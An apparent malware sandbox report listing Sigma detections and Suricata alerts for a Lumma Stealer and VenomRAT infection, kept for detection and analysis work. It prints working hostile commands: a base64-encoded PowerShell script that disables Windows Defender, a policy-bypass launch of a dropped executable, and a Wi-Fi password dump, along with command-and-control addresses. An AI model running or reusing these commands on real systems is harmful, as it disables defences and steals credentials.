Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMA

Sigma detected: Local Accounts Discovery

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\system32\whoami.exe" /groups, CommandLine: "C:\Windows\system32\whoami.exe" /groups, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\whoami.exe, NewProcessName: C:\Windows\SysWOW64\whoami.exe, OriginalFileName: C:\Windows\SysWOW64\whoami.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQA

Sigma detected: Net.exe Execution

Source: Process started

Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: "C:\Windows\system32\net1.exe" start TrustedInstaller, CommandLine: "C:\Windows\system32\net1.exe" start TrustedInstaller, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net1.exe, NewProcessName: C:\Windows\SysWOW64\net1.exe, OriginalFileName: C:\Windows\SysWOW64\net1.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQA

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\ClientAny.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\ClientAny.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\ClientAny.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1856, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\ClientAny.exe"' , ProcessId: 2928, ProcessName: powershell.exe

Sigma detected: Start Windows Service Via Net.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\system32\net1.exe" start TrustedInstaller, CommandLine: "C:\Windows\system32\net1.exe" start TrustedInstaller, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net1.exe, NewProcessName: C:\Windows\SysWOW64\net1.exe, OriginalFileName: C:\Windows\SysWOW64\net1.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQA

Sigma detected: Stop Windows Service Via Net.EXE

Source: Process started

Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\net1.exe" stop windefend, CommandLine: "C:\Windows\system32\net1.exe" stop windefend, CommandLine|base64offset|contains: ), Image: C:\Windows\SysWOW64\net1.exe, NewProcessName: C:\Windows\SysWOW64\net1.exe, OriginalFileName: C:\Windows\SysWOW64\net1.exe, ParentCommandLine: powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2304, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\net1.exe" stop windefend, ProcessId: 3140, ProcessName: net1.exe

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe, ParentProcessId: 6728, ParentProcessName: H3tyh96.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 7412, ProcessName: cmd.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T11:11:24.183678+0100	2028371	3	Unknown Traffic	192.168.2.5	49867	104.21.32.1	443	TCP
2024-12-10T11:11:26.639127+0100	2028371	3	Unknown Traffic	192.168.2.5	49881	104.21.32.1	443	TCP
2024-12-10T11:11:34.831663+0100	2028371	3	Unknown Traffic	192.168.2.5	49912	104.21.32.1	443	TCP
2024-12-10T11:11:39.489940+0100	2028371	3	Unknown Traffic	192.168.2.5	49927	104.21.32.1	443	TCP
2024-12-10T11:11:43.194124+0100	2028371	3	Unknown Traffic	192.168.2.5	49935	104.21.32.1	443	TCP
2024-12-10T11:11:43.372106+0100	2028371	3	Unknown Traffic	192.168.2.5	49938	104.21.32.1	443	TCP
2024-12-10T11:11:46.167014+0100	2028371	3	Unknown Traffic	192.168.2.5	49948	104.21.32.1	443	TCP
2024-12-10T11:11:46.877765+0100	2028371	3	Unknown Traffic	192.168.2.5	49950	104.21.32.1	443	TCP
2024-12-10T11:11:52.280070+0100	2028371	3	Unknown Traffic	192.168.2.5	49987	104.21.32.1	443	TCP
2024-12-10T11:11:53.664367+0100	2028371	3	Unknown Traffic	192.168.2.5	49994	104.21.32.1	443	TCP
2024-12-10T11:11:56.628576+0100	2028371	3	Unknown Traffic	192.168.2.5	50007	104.21.32.1	443	TCP
2024-12-10T11:11:58.637296+0100	2028371	3	Unknown Traffic	192.168.2.5	50014	104.21.32.1	443	TCP
2024-12-10T11:12:03.178884+0100	2028371	3	Unknown Traffic	192.168.2.5	50028	104.21.32.1	443	TCP
2024-12-10T11:12:20.006230+0100	2028371	3	Unknown Traffic	192.168.2.5	50093	104.21.32.1	443	TCP
2024-12-10T11:12:27.388054+0100	2028371	3	Unknown Traffic	192.168.2.5	50095	104.21.32.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T11:11:24.987762+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49867	104.21.32.1	443	TCP
2024-12-10T11:11:28.705077+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49881	104.21.32.1	443	TCP
2024-12-10T11:11:44.743932+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49935	104.21.32.1	443	TCP
2024-12-10T11:11:47.387250+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49948	104.21.32.1	443	TCP
2024-12-10T11:12:21.191573+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50093	104.21.32.1	443	TCP
2024-12-10T11:12:28.691306+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50095	104.21.32.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T11:11:24.987762+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49867	104.21.32.1	443	TCP
2024-12-10T11:11:44.743932+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49935	104.21.32.1	443	TCP
2024-12-10T11:12:21.191573+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50093	104.21.32.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T11:11:28.705077+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49881	104.21.32.1	443	TCP
2024-12-10T11:11:47.387250+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49948	104.21.32.1	443	TCP
2024-12-10T11:12:28.691306+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50095	104.21.32.1	443	TCP

ET MALWARE Observed Malicious SSL Cert (VenomRAT)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T11:11:18.455224+0100	2052267	1	Domain Observed Used for C2 Detected	205.209.109.10	4449	192.168.2.5	49856	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T11:11:24.183678+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49867	104.21.32.1	443	TCP
2024-12-10T11:11:26.639127+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49881	104.21.32.1	443	TCP
2024-12-10T11:11:34.831663+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49912	104.21.32.1	443	TCP
2024-12-10T11:11:39.489940+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49927	104.21.32.1	443	TCP
2024-12-10T11:11:43.194124+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49935	104.21.32.1	443	TCP
2024-12-10T11:11:43.372106+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49938	104.21.32.1	443	TCP
2024-12-10T11:11:46.167014+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49948	104.21.32.1	443	TCP
